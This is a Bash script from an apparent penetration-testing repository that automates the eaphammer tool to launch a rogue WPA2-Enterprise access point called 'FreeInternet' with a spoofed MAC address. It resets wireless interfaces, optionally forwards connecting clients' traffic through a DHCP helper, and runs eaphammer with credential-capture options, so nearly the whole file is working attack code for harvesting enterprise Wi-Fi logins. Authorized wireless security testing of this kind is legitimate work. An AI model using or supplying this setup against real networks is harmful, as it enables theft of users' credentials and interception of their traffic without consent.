mgeeky-Penetration-Testing-.../networks/wpa2-enterprise-utils/startEAPHammer.sh

97 lines
2.8 KiB
Bash
Raw Normal View History

#!/bin/bash
#
# This script launches `eaphammer` tool by s0lst1c3, available from:
# https://github.com/s0lst1c3/eaphammer.git
#
# The tool is a great way to manage hostapd-wpe server as well as perform
# additional attacks around the concept. Although when used in penetration
# testing assignments, the tool may not be as reliable as believed due to
# various nuances with WLAN interface being blocked, not reloaded,
# DHCP-forced and so on. This is where this script comes in - it tries to
# automatize those steps before launching the tool and after.
#
# Especially handy when used with companion script called:
# `initDHCPServer.sh`
#
# Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
#
####################################################################
# CONFIGURATION
# Name of offered Fake/Rouge AP
ESSID=FreeInternet
# MAC Address of Fake/Rouge AP
BSSID=24:01:c7:31:13:37
# Channel
CH=10
# Additional `eaphammer` options to pass.
EAPHAMMER_OPTS="--creds --wpa 2 --auth ttls"
# Wireless interface to use for Rogue/Fake AP purposes.
WLAN_IFACE=wlan0
# [optional] Outbound to WAN interface (default gateway) where to pass victim's
# internet connection. If not specified, there will be no IP forwarding set.
OUTBOUND_IFACE=
# Directory in which `eaphammer` has been installed/cloned.
EAPHAMMER_DIR=/root/tools/eaphammer
# [optional] Directory with this very script. Needed to find `initDHCPServer.sh` companion
# script. If not specified, will try to use this script's current working directory.
THIS_SCRIPT_DIR=/root/vmshared/wifiPentest
####################################################################
echo "[STEP 0]: Preliminary cleanup"
pkill dhclient
pkill dhcpd
echo "[STEP 1]: nl802111 driver Bug workaround"
nmcli radio wifi off
rfkill unblock wlan
echo "[STEP 2]: Reloading wireless interface"
ifconfig $WLAN_IFACE down
ifconfig $WLAN_IFACE up
sleep 2
echo "[STEP 3]: Reloading outbound interface."
if [ -n "$OUTBOUND_IFACE" ]; then
dhclient -r $OUTBOUND_IFACE
dhclient -v $OUTBOUND_IFACE 2>&1 | grep 'bound to'
else
echo "No outbound interface specified. Skipping step..."
fi
echo "[STEP 4]: Starting DHCP launch script in background"
if [ -n "$OUTBOUND_IFACE" ]; then
if [ -z "$THIS_SCRIPT_DIR" ]; then
THIS_SCRIPT_DIR="$( cd "$(dirname "{BASH_SOURCE[0]}" )" && pwd)"
fi
eval "$THIS_SCRIPT_DIR/initDHCPServer.sh $WLAN_IFACE $OUTBOUND_IFACE" &disown;
else
echo "No outbound interface specified. Skipping step..."
fi
pushd $EAPHAMMER_DIR > /dev/null
echo "[STEP 5]: Starting eaphammer with options: '$EAPHAMMER_OPTS'"
####################################################################
./eaphammer -i $WLAN_IFACE -e $ESSID -b $BSSID -c $CH $EAPHAMMER_OPTS
####################################################################
popd > /dev/null
echo "[STEP 6]: Killing services."
pkill dhclient
pkill dhcpd